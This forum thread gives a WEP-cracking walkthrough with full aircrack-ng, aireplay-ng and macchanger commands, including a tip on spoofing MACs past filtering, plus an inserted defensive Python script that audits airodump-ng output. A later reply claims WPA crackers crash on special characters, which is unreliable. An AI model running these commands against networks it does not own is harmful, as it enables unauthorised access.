
Thread: Cracking your own WEP Network to test security

  1. #1
    phpforfun

    Cracking your own WEP Network to test security

    This is a short tutorial showing you how to secure your own WEP network. First let me say, the only 100% sure way to secure your wireless network is to disable wireless, but if you use it, then you can't.

    What is WEP?
    Wired Equivalent Privacy (WEP) is a security protocol for wireless networks that encrypts transmitted data. It's easy to configure. Without any security your data can be intercepted without difficulty.
    Please do not confuse this with WPA. WPA is Wi-Fi Protected Access, a security standard for wireless networks. This requires a password, NOT a key.

    1) Can you even do it?
    First we need to be sure your wireless card can support packet injection. I used my Acer Aspire 5920. It comes with an 802.11a/b/g WLAN wireless card. It can't do packet injection. Thus I purchased the Hawking HWUG1 wireless card. Hard to come by, but one of the best out there. Best Buy has them for $40, give or take.

    2) Install the software
    Some people like to use BackTrack Live OS, which to me is pointless, unless you don't want to install Linux and use it as your everyday running operating system. You need 2 things to do this: macchanger and aircrack-ng.

    Commands:
    Make yourself the root user:
    sudo -s
    Install Aircrack
    apt-get install aircrack-ng
    Install macchanger
    apt-get install macchanger
    There! You have the 2 programs that make it easy to continue.

    3) Verify you can use injection
    Open the terminal, and type iwconfig. It will show you your network cards.

    You will see I have 2 wireless cards, wlan0 and rausb0. wlan0 is what won't work, so we need to disable that; rausb0 is the wireless card I purchased.
    Type the following command:
    aireplay-ng --test rausb0
    That will show the following result.

    If it doesn't, you need to get a wireless card that works.

    4) Spoof mac and put your wireless card into monitor mode
    I will list the commands, and what they do. You don't NEED to spoof your MAC, but it sure makes it a lot easier to remember.

    We don't need wlan0, so let's disable it.
    ifconfig wlan0 down
    We need to disable rausb0 as well, so we can modify it
    ifconfig rausb0 down
    Change your mac (can be whatever you want as long as it looks like ##:##:##:##:##:##)
    macchanger --mac 00:11:22:33:44:55 rausb0
    The below commands are used for the Hawking wireless card only; I believe they enable the drivers for the wireless card
    modprobe -r rt73
    modprobe rt73
    Bring up rausb0 for use
    ifconfig rausb0 up
    Modify the bit rate of rausb0 to 1Mb/s
    iwconfig rausb0 rate 1M
    Confirm the bit rate
    iwconfig rausb0
    Enable rausb0 for use
    airmon-ng start rausb0
    Here is a screenshot of me doing all of that (don't mind the typo)

    You are now ready to begin!

    5) Monitor the wireless networks around you, choose your target
    Type the following command into your terminal
    airodump-ng rausb0
    This will monitor the wireless networks around you, as well as the stations connected to them.

    You will notice the command will display pretty much everything you need. We will attack 2WIRE (my wireless LAN). Notice it's WEP, and it's on channel 6. I have highlighted the BSSID.
    NOTE: Looking at the screenshot, you will notice it shows the stations connected to BSSIDs. This is why MAC filtering is pointless: if they can connect and you can't, spoof your MAC to theirs, and chances are it will let you in. If the station's connected BSSID is blank, that means he's looking or trying to connect to a BSSID, but has not yet.

    6) Run Airodump-ng
    Once you have selected your target, you can monitor the data packets it is sending out.
    Type the below command into the terminal.
    airodump-ng -c 6 -w 2wire --bssid 00:12:88:FE:7A:21 rausb0
    -c will specify the channel the BSSID is on, 2WIRE is on 6
    -w will write the packet data to a file, I chose to name the file 2wire
    --bssid will specify the BSSID you are trying to connect to.
    NOTE: LEAVE THIS RUNNING! Open a new terminal tab, and sudo -s again as admin

    Notice how the Data column says 0? It will climb to 5000 to 10000 packets. If you can't even hit 5000, then your signal isn't good enough. This may take time; it can take anywhere from 2 minutes to 30 minutes. Be patient.

    7) Fake Authentication with Access Point
    Type the below command in the terminal
    aireplay-ng -1 0 -a 00:12:88:FE:7A:21 -h 00:11:22:33:44:55 rausb0
    -a forces attack mode
    -h is the host, that is your mac

    The authentication must read successful in order for you to continue. I have had to run this command a few times to get it to be successful.

    8) Run Aireplay with -3 (start aireplay-ng in ARP Request Replay Mode)

    Type the below command into the terminal:
    aireplay-ng -3 -b 00:12:88:FE:7A:21 -h 00:11:22:33:44:55 rausb0
    NOTE: Open a new tab again! Let this run as well!!


    9) LAST STEP! Decrypt the packet data
    If you go into the terminal and type "ls /home", you will see some .cap files. I named my log 2wire, thus it will be "2wire-01.cap"
    Type the following command into the terminal:
    aircrack-ng -n 64 --bssid 00:12:88:FE:7A:21 2wire-01.cap
    Hope it has enough data to decrypt, if not, it will say please wait and try later.


    SUCCESS!
    Checkout my new forum! http://adminreference.com/
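
A defender's use of the same airodump-ng survey, as an added example that is not part of the original post: it reads the CSV file that airodump-ng -w writes next to the .cap capture and lists which of your own access points still advertise WEP or no encryption, with the number of clients associated to each. The sample rows, the OfficeA and Guest networks, the station MACs and the function names are constructed for illustration; only the 2WIRE BSSID comes from the post.

```python
import csv
import io

# Constructed sample in the layout of airodump-ng's <prefix>-01.csv: an
# access-point table, a blank line, then a station table.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:12:88:FE:7A:21, 2008-10-01 20:00:00, 2008-10-01 20:05:00,  6, 54, WEP, WEP, , -40, 120, 5321, 0.0.0.0, 5, 2WIRE,
02:00:00:AA:BB:01, 2008-10-01 20:00:02, 2008-10-01 20:05:00, 11, 54, WPA2, CCMP, PSK, -55, 118, 0, 0.0.0.0, 7, OfficeA,
02:00:00:AA:BB:02, 2008-10-01 20:00:03, 2008-10-01 20:05:00,  1, 54, OPN, , , -60, 90, 0, 0.0.0.0, 5, Guest,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
02:00:00:CC:DD:01, 2008-10-01 20:01:00, 2008-10-01 20:05:00, -30, 6000, 00:12:88:FE:7A:21,
02:00:00:CC:DD:02, 2008-10-01 20:01:30, 2008-10-01 20:05:00, -48, 40, (not associated), OfficeA
"""

WEAK = {"WEP": "WEP in use; switch to WPA/WPA2 with a strong passphrase",
        "OPN": "no encryption configured"}

def parse_tables(csv_text):
    """Split the file into AP rows and station rows, keyed by column name."""
    aps, stations, header, target = [], [], None, None
    for row in csv.reader(io.StringIO(csv_text)):
        fields = [f.strip() for f in row]
        if not fields or not fields[0]:
            continue                      # blank separator between the tables
        if fields[0] == "BSSID":
            header, target = fields, aps
        elif fields[0] == "Station MAC":
            header, target = fields, stations
        elif header is not None:
            target.append(dict(zip(header, fields)))
    return aps, stations

def audit(csv_text, my_bssids):
    """Report weak encryption on the BSSIDs you own, with client counts."""
    mine = {b.upper() for b in my_bssids}
    aps, stations = parse_tables(csv_text)
    findings = []
    for ap in aps:
        bssid = ap["BSSID"].upper()
        hits = [WEAK[t] for t in ap.get("Privacy", "").split() if t in WEAK]
        if bssid in mine and hits:
            clients = sum(1 for s in stations if s.get("BSSID", "").upper() == bssid)
            findings.append((bssid, ap.get("ESSID", ""), hits[0], clients))
    return findings

if __name__ == "__main__":
    print(audit(SAMPLE_CSV, ["00:12:88:fe:7a:21", "02:00:00:AA:BB:01"]))
```

The client count tells you how many devices will need the new settings once the access point is moved off WEP.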

  3. #2
    Zapper

    Re: Cracking your own WEP Network to test security

    Interesting, +rep, I will try this later.

  4. #3
    phpforfun

    Re: Cracking your own WEP Network to test security

    thanks!

  5. #4
    Jordan Guest

    Re: Cracking your own WEP Network to test security

    Excellent tutorial phpforfun, +rep.

    What do you recommend for making your wireless network more secure?

  6. #5
    phpforfun

    Re: Cracking your own WEP Network to test security

    Quote: Originally Posted by Jordan
    Excellent tutorial phpforfun, +rep.

    What do you recommend for making your wireless network more secure?
    Great question, I should have posted that in the main post.

    WPA, alphanumeric with a special character in it. The only program I know that can be used to crack WPA/WPA2 passwords will crash if it has a special char put in the passwords list.

  7. #6

    Re: Cracking your own WEP Network to test security

    It depends on what you consider to be a special character. I consider the character "X" to be special, for instance.

    Quote Originally Posted by Jordan View Post
    Good members, like yourself, stick around and post for ages to come!
    Mr. Xav | Blog | Forums

  8. #7
    phpforfun

    Re: Cracking your own WEP Network to test security

    Quote: Originally Posted by Xav
    It depends on what you consider to be a special character. I consider the character "X" to be special, for instance.
    Glossary

    Special Character:
    A non-numeric character not in the a-z alphabet. Common examples include ~!@#$%^&* ()_+=-`';/.,?><:"|}{\ In the context of the required Special Character for Complex Passwords, it is recommended that you do not use: @, %, ^, &, {, ~, <, or punctuation marks (such as: !, ? , ., :, ;, ' ,", ,. )
    You would be wrong.

  9. #8

    Re: Cracking your own WEP Network to test security

    I don't care what albany.edu says. I still consider the "X" character to be rather special.

    Mr. Xav | Blog | Forums

  10. #9
    phpforfun

    Re: Cracking your own WEP Network to test security

    Some people would say the same about you.

  11. #10
    Jordan Guest

    Re: Cracking your own WEP Network to test security

    And why is X special to you?

